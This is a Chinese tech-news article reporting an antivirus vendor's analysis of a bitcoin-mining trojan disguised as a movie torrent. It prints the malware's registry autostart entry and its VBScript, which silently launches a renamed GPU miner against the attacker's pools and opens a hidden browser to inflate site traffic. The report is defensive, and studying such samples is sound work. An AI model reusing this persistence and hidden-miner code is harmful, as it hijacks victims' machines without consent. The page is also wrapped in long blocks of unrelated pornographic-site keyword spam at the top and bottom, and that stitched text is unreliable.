精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

比特幣木馬機理詳解

移動開發(fā)
黑客入侵別人電腦難道只是為了生產(chǎn)看不見摸不著的比特幣嗎?我們搜索與比特幣有關的新聞發(fā)現(xiàn),這個不為公眾所知的全球性虛擬貨幣身價不菲。在過去的三年里,比特幣的價格上漲了5000倍。2010年,比特幣剛誕生時,1比特幣僅值5美分,三年里一度沖上266美元,今天比特幣兌美元的匯率是1:122

6月5日,金山毒霸安全中心宣布截獲國內首個比特幣(一種全球流通的網(wǎng)絡虛擬貨幣)挖礦木馬,該木馬偽裝成熱門青春勵志電影《中國合伙人》視頻傳播,黑客控制中毒電腦制造比特幣牟利。很多人表示無法理解,黑客入侵別人電腦難道只是為了生產(chǎn)看不見摸不著的比特幣嗎?

金山毒霸安全專家表示,有時很難理解病毒作者的行為。不過,我們搜索與比特幣有關的新聞卻發(fā)現(xiàn),這個不為公眾所知的全球性虛擬貨幣身價不菲。在過去的三年 里,比特幣的價格上漲了5000倍。2010年,比特幣剛誕生時,1比特幣僅值5美分,三年里一度沖上266美元,今天比特幣兌美元的匯率是1:122

圖1 比特幣最新匯率

有關比特幣的討論引起各界關注,6月5日,美聯(lián)儲副主席珍妮特・耶 倫(Janet Yellen)在國際貨幣基金組織(IMF)年會上表示,美國政府正在研究PayPal(注:類似于支付寶的線上支付工具)和比特幣等在 線支付機制的潛在風險。全球最著名的盜版組織海盜灣的創(chuàng)始人Falkvinge在2011年將全部身家兌換成比特幣,他在最新發(fā)表的文章中指出比特幣是唯 一可以挑戰(zhàn)美國霸權地位的東西。

有國內金融專家認為比特幣不屬于真正意義上的貨幣,只是一種數(shù)量有限的電子商品。制造比特幣被形象的比喻為挖礦,將比特幣看成是人為創(chuàng)造的一座礦藏,屬于有限資源(根據(jù)比特幣算法,最多只有2100萬個),人人都可以挖,誰挖到算誰的。

圖2 利用高性能顯卡GPU挖礦

比特幣在中國也剛剛為人所知,在淘寶網(wǎng)能搜索到1200件與“比特幣”有關的商品,甚至有的網(wǎng)店開始接收比特幣購物。雅安地震時,壹基金就接收了233個比特幣的捐款(當時價值約22萬人民幣)。

一臺性能普通的計算機生產(chǎn)比特幣大概只能收獲0.12美元,而采用高性能GPU顯卡的電腦挖礦效率會高得多。有人計算,一個單 AMD Radeon 6750 顯卡,每月可賺取3個比特幣。黑客如果使用木馬控制1000臺這樣的計算機,每月就能賺取3000 比特幣,市值約36 萬美元。

 

“不為常人所知的比特幣,成了真正的金礦,令不少人砰然心動。”金山毒霸安全專家這樣說,“我們截獲的這個比特幣礦工病毒大約感染了1500臺計算機。分析發(fā) 現(xiàn),這款比特幣礦工病毒,只調用顯卡的高性能GPU(顯卡主芯片)生產(chǎn)比特幣,未調用CPU資源生產(chǎn),因而一般用戶并不會覺得系統(tǒng)性能下降。如果這個用戶 是高分辨率3D游戲玩家,就會感到游戲卡頓。”

圖3 金山毒霸在電腦中檢測到比特幣礦工

金山毒霸安全專家建議用戶檢查自己的電腦是否被比特幣礦工木馬入侵,盡管這款病毒沒有其他破壞行為,但長時間挖礦對GPU的消耗可能令顯卡溫度過高。另外, 這個病毒還會劫持淘寶客流量,在中毒電腦上發(fā)生的每一筆淘寶交易都會給病毒作者支付酬金,淘寶店主會成為該病毒的另一個受害者。

附:比特幣礦工病毒分析報告

一、樣本信息:

母體樣本(偽裝為熱門電影)通過bt種子傳播。(中國合伙人,星際迷航:暗黑無界等)騙取用戶點擊運行。用戶中招后,病毒會向windows目錄下釋放 csrss.exe,svchost.exe,lsass.exe 等病毒文件。進行淘寶客劫持、刷網(wǎng)站流量、挖bit幣等行為。

病毒工作流程圖:

流程圖

母體:

病毒母體通過BT種子傳播,偽裝為電影文件,程序的圖標也偽裝為播放器圖標。病毒母體通過末尾overlay填充0進行膨脹,使得病毒母體達800M的體積,迷惑用戶認為這個程序為正常電影。

[[74508]]

解壓后的文件

母體行為較為簡單,大致分為3個行為:

1.釋放病毒文件至Windows目錄。

運行后會將csrss.exe,svchost.exe,lsass.exe (這些文件為與系統(tǒng)同名的病毒文件)等病毒文件釋放至Windows目錄下。

2.設置啟動項

將csrss文件加入到啟動項中,此步驟和上一步驟都是用了smart install方法。將釋放的文件和需要修改的注冊表都寫在了配置文件中,當做安裝程序一樣修改注冊表,釋放文件。

 

3.彈框提示用戶此視頻無法播放

此程序會彈出窗口,提示用戶,此文件無法播放,從而隱蔽自己。

運行后彈出窗口

病毒子體:

母體釋放的主要的病毒子體為csrss.exe,svchost.exe,lsass.exe。病毒文件csrss.exe(偽裝后的名稱)為主要調動程 序,負責調用svchost.exe(病毒,刷淘寶客)和lsass.exe(病毒,用于刷bit幣,挖礦工具)。(后文都用 csrss.exe, svchost.exe, lsass.exe 這三個名字代表這三個病毒文件,切勿與系統(tǒng)文件混淆,特此聲明)。其余文件為挖礦 程序的附加程序。

病毒母體釋放文件

Csrss.exe

被設置為自啟動項,啟動后解密自身資源中的腳本,運行腳本。調用svchost和lsass.exe兩個程序進行刷淘寶客和bit幣,后臺訪問51yingshi刷流量。

自啟動項:

 

  1. [HKEY_CURRENT_USER\Software\Microsoft\WindowsNT\CurrentVersion\Winlogon] 
  2. "Shell"="explorer.exe,C:\\Windows\\csrss.exe" 

 

生成的腳本內容:

 

  1. Dim WS 
  2.  
  3. Dim IE 
  4.  
  5. Dim Num 
  6.  
  7. Dim Lsass(2) 
  8.  
  9. Set WS=WScript.CreateObject("WScript.Shell") 
  10.  
  11. Set IE=Createobject("InternetExplorer.Application") 
  12.  
  13. Randomize 
  14.  
  15. Num=Int(2*Rnd+1) 
  16.  
  17. Lsass(1)="--url http://51wakuang.net:9332 --user1ByRGxLJHempFNi7JyTspXG3oFyrp7GHFH --pass P@ssw0rd --auto-fan --auto-gpu" 
  18.  
  19. Lsass(2)="--scrypt --url http://51wakuang.net:9327 --userLQYU5RGhvCVUBePSfAfAcsLkt5XSi1EgBQ--pass P@ssw0rd --auto-fan --auto-gpu" 
  20.  
  21. IE.Visible=Flase 
  22.  
  23. IE.Navigate "http://www.51yingshi.net" 
  24.  
  25. WS.Run "C:\Windows\svchost.exe15653040_3457137_11236246",0,False 
  26.  
  27. WS.Run "C:\Windows\lsass.exe"&Lsass(Num)&"",0,False 

 

簡單的解釋一下這段代碼的含義:

本段代碼有3個作用,調用lsass.exe進行刷bit幣,調用svchost刷淘寶客,訪問

創(chuàng)建一個wscript.shell對象WS,ws對象運行兩個命令。

(1)

  1. WS.Run "C:\Windows\svchost.exe15653040_3457137_11236246",0,False 

這里調用svchost,進行刷淘寶客。 后面標紅的參數(shù)15653040_3457137_11236246為PID。

 

  1. WS.Run "C:\Windows\lsass.exe"&Lsass(Num)&"",0,False 

執(zhí)行l(wèi)sass程序進行刷bit幣,后面的登錄賬號有兩個選擇,每次隨即抽取。

 

  1. Lsass(1)="--url http://51wakuang.net:9332 --user1ByRGxLJHempFNi7JyTspXG3oFyrp7GHFH --pass P@ssw0rd --auto-fan --auto-gpu" 
  2. Lsass(2)="--scrypt --url http://51wakuang.net:9327 --userLQYU5RGhvCVUBePSfAfAcsLkt5XSi1EgBQ--pass P@ssw0rd --auto-fan --auto-gpu" 

 

同樣,病毒創(chuàng)建了一個IE對象,后臺默默訪問www.51yingshi.net。瀏覽器設置為隱藏。

代碼如下:

 

  1. IE.Visible=Flase 
  2. IE.Navigate "http://www.51yingshi.net" 

 

Lsass.exe

此文件原名為cgminer, 是一個公開的挖礦軟件,與此軟件一起的文件有12個(包含一個文件夾)。其中l(wèi)sass用于gpu挖礦,lsass-nogpu用于cpu挖礦。病毒作者這里只調用了lsass,利用Gpu挖礦,沒有利用cpu進行挖礦。原因可能是cpu完礦的效率很低。本文最后附屬cpu 、gpu挖礦效率對比。

挖礦文件列表如下:

用法為:

cgminer -o 礦池地址 -u 用戶名 -p 密碼

可以推斷出的信息有病毒作者挖礦的礦池,用戶名和密碼。

1.礦池:http://51wakuang.net:9332

用戶名:1ByRGxLJHempFNi7JyTspXG3oFyrp7GHFH

密碼:P@ssw0rd--auto-fan --auto-gpu

2.礦池:http://51wakuang.net:9327

用戶名:LQYU5RGhvCVUBePSfAfAcsLkt5XSi1EgBQ

密碼:P@ssw0rd--auto-fan --auto-gpu

此程序運行截圖:

Svchost.exe

用于淘寶客劫持,盜用了智謀淘寶客插件。淘寶客劫持的手法較為普通,這里不做過多介紹。

責任編輯:閆佳明 來源: 51cto
相關推薦

2022-09-30 14:15:07

區(qū)塊鏈比特幣虛擬貨幣

2013-06-05 17:02:42

2021-06-08 21:49:06

比特幣區(qū)塊鏈礦工

2021-01-19 14:57:47

AI

2021-02-19 18:47:24

比特幣加密貨幣區(qū)塊鏈

2020-05-20 20:00:46

比特幣數(shù)字貨幣區(qū)塊鏈

2013-04-07 14:16:44

2021-01-08 14:40:56

比特幣加密貨幣區(qū)塊鏈

2018-04-10 08:31:44

2021-02-22 11:50:49

比特幣加密貨幣美元

2014-03-06 14:08:11

2021-01-25 16:20:27

比特幣互聯(lián)網(wǎng)技術

2021-01-14 09:20:49

木馬區(qū)塊鏈加密貨幣

2018-10-24 10:40:41

2021-08-09 15:08:15

數(shù)字人民幣比特幣貨幣

2014-02-12 15:24:23

2015-05-05 10:13:46

2021-09-27 22:40:13

比特幣虛擬貨幣金融

2013-11-10 17:03:56

2013-11-11 09:32:42

點贊
收藏

51CTO技術棧公眾號

阿v视频在线观看| 亚洲AV午夜精品| 日本一区二区三区视频| 欧美高清性hdvideosex| www.国产在线视频| 成黄免费在线| 国产999精品久久| 国产精品久久久久不卡| 日本黄色小说视频| 精品国产aⅴ| 精品国产不卡一区二区三区| 精品久久久久av| 日韩电影免费观看| 国产欧美精品一区二区色综合| 91在线观看网站| 国产suv精品一区二区33| 欧美激情日韩| 日韩亚洲成人av在线| 亚洲精品乱码久久久久久不卡| 草莓视频成人appios| 性久久久久久久久| 国产又大又长又粗又黄| 男人的天堂在线视频| 国产91精品在线观看| 国产精品专区h在线观看| 日本va欧美va国产激情| 欧美精品国产一区| 深夜福利亚洲导航| 一级片视频免费看| 色老板在线视频一区二区| 日韩精品一区二区三区三区免费 | 欧美精选视频一区二区| 亚洲图片欧美视频| 69精品丰满人妻无码视频a片| www日韩tube| 国产午夜亚洲精品理论片色戒| 国产精品高清一区二区三区| 999精品国产| 毛片基地黄久久久久久天堂| 国产精品成人国产乱一区| 亚洲一区 视频| 欧美喷水视频| 欧美日本黄视频| 国产大片免费看| 亚洲欧洲美洲一区二区三区| 久久夜色精品亚洲噜噜国产mv| 国产在线免费av| 精品无人区麻豆乱码久久久| 亚洲欧美国产va在线影院| 欧美xxxxx精品| 另类ts人妖一区二区三区| 亚洲国产成人精品女人久久久| 欧美人与性动交α欧美精品| 麻豆精品一区| 毛片网站在线观看| 蜜桃视频在线观看www社区| 久久91精品国产91久久小草 | 国产精品19乱码一区二区三区| 亚洲精品二区三区| 欧美大肥婆大肥bbbbb| 三级在线观看免费大全| 欧美 日韩 国产一区二区在线视频 | av片在线免费观看| 亚洲欧洲av在线| 51xx午夜影福利| 在线观看男女av免费网址| 一区二区三区免费| 男女私大尺度视频| 欧美日韩123区| 欧美怡红院视频| 国产5g成人5g天天爽| 精品国产乱码一区二区三区| 精品日韩在线观看| 久久精品一区二区免费播放 | 99re8这里只有精品| 亚洲电影视频在线| 精品美女国产在线| 在线免费视频一区| 最新国产精品精品视频| 亚洲免费中文字幕| 很污很黄的网站| 国产精品国码视频| 国产91在线播放九色快色| 天天综合久久综合| 国产盗摄视频一区二区三区| 欧美乱偷一区二区三区在线| 69久久精品| 亚洲成人动漫一区| 免费一级特黄录像| 亚洲天堂中文字幕在线观看| 亚洲美女性视频| 永久久久久久久| 一区二区三区福利| 国产欧美韩国高清| 视频一区二区三区在线看免费看| 国产精品不卡一区| 欧美 国产 综合| 四虎影视成人精品国库在线观看 | 欧美午夜理伦三级在线观看| 日韩高清一二三区| 精品国产a一区二区三区v免费| 久久国产精品影视| 天天爱天天做天天爽| 国产成人免费视频网站高清观看视频| 玛丽玛丽电影原版免费观看1977| 成码无人av片在线观看网站| 日韩欧美国产高清91| 特黄特黄一级片| 成人影院在线| 日本高清久久天堂| 丰满大乳国产精品| 1000精品久久久久久久久| 毛片av免费在线观看| 亚洲**毛片| www.欧美免费| 黄色网址中文字幕| 99久久国产综合色|国产精品| 亚洲免费视频播放| 97精品国产99久久久久久免费| 日韩国产一区三区| 日本网站在线免费观看| 国产馆精品极品| 在线观看日本一区| 你懂得影院夜精品a| 国产视频久久网| www.国产成人| www.日韩精品| 国产妇女馒头高清泬20p多| 亚洲精品福利| 久久夜色精品国产| 国产偷拍一区二区| 亚洲人成小说网站色在线| 色悠悠久久综合网| 欧洲grand老妇人| 国产福利精品av综合导导航| 性感美女一级片| 午夜激情一区二区| 欧产日产国产精品98| 9国产精品视频| 国产日韩精品久久| 女厕盗摄一区二区三区| 日韩av一区二区在线观看| 久久午夜鲁丝片午夜精品| 国产凹凸在线观看一区二区| 久久艹国产精品| 懂色av一区二区| 亚洲91精品在线观看| 姝姝窝人体www聚色窝| 精品国产乱码久久久久久婷婷| 老司机午夜免费福利| 亚洲激情影院| 麻豆久久久9性大片| 向日葵视频成人app网址| 亚洲欧洲偷拍精品| 中文字幕一级片| 中文字幕亚洲不卡| 色欲无码人妻久久精品| 韩日成人在线| 久久精品国产第一区二区三区最新章节| 英国三级经典在线观看| 国产午夜精品免费一区二区三区 | 国产亚洲自拍av| 成人sese在线| 黑鬼大战白妞高潮喷白浆| 成人羞羞动漫| 999热视频| 中文字幕人成乱码在线观看| 中文字幕精品久久久久| 国产人妻精品一区二区三区| 亚洲成人在线免费| 亚洲区自拍偷拍| 国产精品一区二区无线| 日本a在线免费观看| 欧洲乱码伦视频免费| 成人在线中文字幕| 91白丝在线| 在线观看视频99| 丰满人妻一区二区三区免费| 色悠悠亚洲一区二区| 黄色片子在线观看| 99久久伊人网影院| 日本中文字幕精品—区二区| 欧美特黄一级| 日韩av一区二区三区在线| 男人亚洲天堂| 97在线看免费观看视频在线观看| 国产大片在线免费观看| 日韩免费电影一区| 老熟妇一区二区三区啪啪| 亚洲综合激情另类小说区| 法国伦理少妇愉情| 国产成人亚洲综合a∨猫咪| av观看免费在线| 中文字幕日韩欧美精品高清在线| 免费在线观看91| 免费观看性欧美大片无片| 日韩av电影手机在线| 99福利在线| 揄拍成人国产精品视频| 少妇高潮一区二区三区99小说| 欧美日韩精品一区二区三区| 日韩乱码人妻无码中文字幕| 中文字幕在线一区二区三区| 在线观看av中文字幕| 国产一区二区伦理片| 欧美视频免费播放| 亚洲小说欧美另类社区| 中文字幕中文字幕一区三区| 亚洲8888| 国产日韩欧美综合精品| 精品国产一区二区三区2021| 国产精品va在线| 男人天堂视频在线观看| 色综合视频网站| 国产在线看片| 日韩在线视频播放| a天堂中文在线| 亚洲人成电影网站色xx| 三级在线观看网站| 欧美mv日韩mv| 午夜精品在线播放| 欧美一区二区三区公司| 一区二区三区精| 欧美影院午夜播放| 无码人妻精品一区二区50| 疯狂蹂躏欧美一区二区精品| 日本熟妇毛茸茸丰满| 亚洲国产日韩av| 国产一级一片免费播放| 亚洲激情中文1区| 91插插插插插插| 自拍av一区二区三区| 国内毛片毛片毛片毛片毛片| 国产精品欧美经典| 色噜噜噜噜噜噜| 国产精品污www在线观看| 亚洲天堂视频一区| 久久久一区二区| 在线免费观看成年人视频| 91亚洲男人天堂| 狠狠人妻久久久久久综合蜜桃| www..com久久爱| 成熟妇人a片免费看网站| 成人精品国产一区二区4080| 人妻激情偷乱频一区二区三区| 岛国精品在线观看| 国产chinese中国hdxxxx| 成人午夜看片网址| 午夜男人的天堂| 97se亚洲国产综合在线| 黄色免费看视频| 久久久久久综合| 欧美老熟妇乱大交xxxxx| 国产亚洲欧美在线| 纪美影视在线观看电视版使用方法| 中文在线资源观看网站视频免费不卡 | 性一交一乱一乱一视频| 欧美成人免费网站| 日本xxxxxwwwww| 亚洲美女激情视频| 91se在线| 欧美精品电影在线| 无码小电影在线观看网站免费| 国产91色在线播放| 亚洲免费资源| 成人永久免费| 美女视频亚洲色图| 日韩中文字幕一区| 欧美日本一区二区视频在线观看 | 涩涩网在线视频| 日韩av电影免费观看高清| 深夜福利亚洲| 国产一区二区黄色| 国内精品视频在线观看 | 国产精品试看| wwwwwxxxx日本| 国产成人自拍网| 免费看污黄网站在线观看| 国产精品久99| 免费看日韩毛片| 欧美日韩免费一区二区三区| 性一交一乱一伧老太| 国产亚洲精品久久久久久牛牛| 国产在线看片| 国产成人精品久久二区二区| 成人在线分类| 欧美连裤袜在线视频| 欧美精品三区| 久久久精品麻豆| 丁香婷婷深情五月亚洲| 国产一区二区三区四区在线| 亚洲a一区二区| 一二三区在线播放| 亚洲精品中文字幕女同| 亚洲性图自拍| 国产精品入口福利| 丝袜久久网站| 国产a级黄色大片| 秋霞午夜鲁丝一区二区老狼| 荫蒂被男人添免费视频| 亚洲天堂a在线| 一级片在线观看免费| 亚洲大胆人体av| 国产精品剧情一区二区在线观看 | 亚洲男人天堂网址| 精品国产一区二区三区久久久蜜月| av电影在线观看网址| 91精品国产高清久久久久久| 少妇精品在线| 宅男av一区二区三区| 日日摸夜夜添夜夜添国产精品| 天天躁日日躁狠狠躁av| 亚洲三级电影网站| 亚洲一区二区色| 亚洲一区二区久久久| 成人性生交大片免费网站| 国产欧美丝袜| 欧美日韩国产在线一区| 亚洲五月激情网| 国产精品色哟哟网站| 91丨九色丨海角社区| 亚洲精品影视在线观看| 自拍视频在线看| 精品亚洲欧美日韩| 亚洲精品九九| 婷婷五月精品中文字幕| 亚洲自拍与偷拍| 韩国av免费在线| 国内成人精品视频| 国语一区二区三区| 国产曰肥老太婆无遮挡| 国产成人av一区二区三区在线| 中文乱码字幕高清一区二区| 欧美三区在线视频| 午夜视频成人| 国产欧美中文字幕| 日韩免费av| 在线观看国产福利| 亚洲欧洲精品一区二区三区| 国产美女精品视频国产| 久久精品久久精品亚洲人| 日本国产亚洲| 91看片淫黄大片91| 国产精品一品二品| 国产亚洲第一页| 亚洲成人精品视频| 深夜av在线| 四虎影院一区二区三区 | 亚洲啪av永久无码精品放毛片 | 97青娱国产盛宴精品视频| www.日本在线视频| 99久久er热在这里只有精品66| 国产一区二区99| 亚洲欧洲在线观看| 国产精品99精品一区二区三区∴| 亚洲最新免费视频| 国产成人免费在线观看| 麻豆久久久久久久久久| 一道本无吗dⅴd在线播放一区| 日韩综合av| www成人免费| 91麻豆精品一区二区三区| 日韩国产亚洲欧美| 欧美成人一区二区三区电影| 国产精品22p| 日日碰狠狠躁久久躁婷婷| 国产精品入口麻豆九色| 99草在线视频| 国产91成人video| 日韩精品网站| 精品国产乱码久久久久夜深人妻| 欧美日韩一区二区精品| 9色在线观看| 国产精品久久国产三级国电话系列 | 久久视频中文字幕| 蜜桃一区av| 久久精品影视大全| 亚洲综合一区二区三区| 毛片在线播放网址| 亚洲最大成人免费视频| 久久福利毛片| 污污的视频在线免费观看| 亚洲精品永久免费精品| 日韩国产在线不卡视频| 亚洲成熟丰满熟妇高潮xxxxx| 亚洲免费视频成人| 美女欧美视频在线观看免费 | 特黄特色免费视频| 色婷婷av一区二区三区之一色屋| 成人毛片av在线| 欧美一二三四五区| 国产福利一区二区三区视频| 天天爱天天做天天爽| 欧美精品videossex88| 日韩在线高清| 国产传媒第一页| 日韩精品一区二区三区swag| 欧美成人高清视频在线观看| www.日本在线播放| 亚洲三级在线播放|